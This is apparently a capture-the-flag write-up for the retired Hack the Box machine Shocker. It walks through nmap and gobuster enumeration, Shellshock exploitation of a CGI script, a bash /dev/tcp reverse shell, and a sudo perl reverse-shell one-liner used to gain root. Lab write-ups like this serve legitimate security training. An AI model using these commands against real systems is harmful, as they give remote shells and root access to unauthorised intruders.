Hack the Box Writeup - Shocker
This post is a guide to the retired Hack the Box system, Shocker. Taking us through initial enumeration, all the way through to gaining a root shell.
Today's post will take us through one of the easier retired boxes on Hack the Box; Shocker.
The IP address of the box is 10.10.10.56 so, as always, lets start with our initial enumeration.
Enumeration
We begin with nmap.
$ nmap -sC -sV -p- -oA nmap/initial 10.10.10.56
The flags breakdown as follows:
- -sC : Run all default scripts
- -sV : Enumerate versions of software running on found ports
- -p- : Check all ports from 0 to 65535
- -oA : Save the output of the scan in all available formats
This gives us the following results:
As you can see we have two ports open; port 80 running Apache and port 2222 that seems to be running ssh.
Running curl on port 80 returns us the following HTML:
<!DOCTYPE html>
<html>
<body>
<h2>Don't Bug Me!</h2>
<img src="bug.jpg" alt="bug" style="width:450px;height:350px;">
</body>
</html>
This shows that port 80 is in fact running a website, so lets have a dig at it with gobuster.
$ gobuster -u http://10.10.10.56 -w /usr/share/wordlists/dirb/small.txt -s 307,200,204,301,302,403 -x txt,sh,cgi,pl -t 50
The flags are for the following settings:
- -u : the URL of the host we wish to scan
- -w : which word-list we want to use
- -s : the response status codes we want to know about
- -x : the file extensions we wish to check each entry of our word-list with
- -t : the number of threads to run to speed things up a little bit
This finishes quite quickly with the following results:
We can see that there is a cgi-bin
directory currently returning a 403 - Forbidden
response code. So lets run gobuster again, but starting in that cgi-bin
directory this time.
$ gobuster -u http://10.10.10.56/cgi-bin/ -w /usr/share/wordlists/dirb/small.txt -s 307,200,204,301,302,403 -x txt,sh,cgi,pl -t 50
Again, the results come back quite quickly, showing us a shell script called user.sh
.
We can run curl on the newly found URL to verify it.
$ curl http://10.10.10.56/cgi-bin/user.sh
Given the output we receive back, it looks like the script is running some bash.
Now that we know we have a cgi script executing valid bash (and given the clue in the name of the machine), it seems that this machine is likely to be vulnerable to shellshock.
Exploitation
A quick search of exploit-db gives us a likely script we can use.
https://www.exploit-db.com/exploits/34900/
However, looking at the code we can see that we will need to specify an extra parameter in order to make sure the exploit script can find our vulnerable cgi script on the server.
So download the script and run it as follows (modifying the lhost and lport params to fit your machine):
$ python shellshock.py payload=reverse rhost=10.10.10.56 lhost=10.10.14.15 lport=4444 pages=/cgi-bin/user.sh
We get a shell, yay! :D
The id
command shows that we are running as the user shelly
and a quick pwd
shows that we need to change to the user's home directory to get hold of the user flag.
Getting a Better Shell
Now that we have a basic shell and the first user flag, we need to enumerate the system from our new point of view. However, the first thing I want to do is get a better and more stable shell. Using the very useful reverse-shell cheat-sheet on pentestmonkey (here), we can setup a netcat listener on our Kali box, and then run the following in our basic shell.
$ bash -i >& /dev/tcp/10.10.14.15/8888 0>&1
Then we can get a shell capable of job control by using a neat Python trick; except that the normal python
binary doesn't seem to be on the machine. A quick locate python
later however, shows us that python3
is on there instead. So now we can run the following:
$ python3 -c "import pty; pty.spawn('/bin/bash');"
More Enumeration
With our shiny new, more stable, shell, we can begin further enumeration of this box to elevate our privileges to root. One of the first things I check, before running any scripts like LinEnum.sh, is to take a look at the sudoers file.
$ sudo -l
Which in this case gives us a big win immediately.
Privilege Escalation
This shows us that our current user can run the perl command using sudo without any passwords. So referring back to the pentestmonkey cheat sheet we can find a perl reverse shell, setup another netcat listener on a different port, then just run the perl one-liner using sudo.
$ sudo perl -e 'use Socket;$i="10.10.14.15";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
Winner, winner, chicken dinner!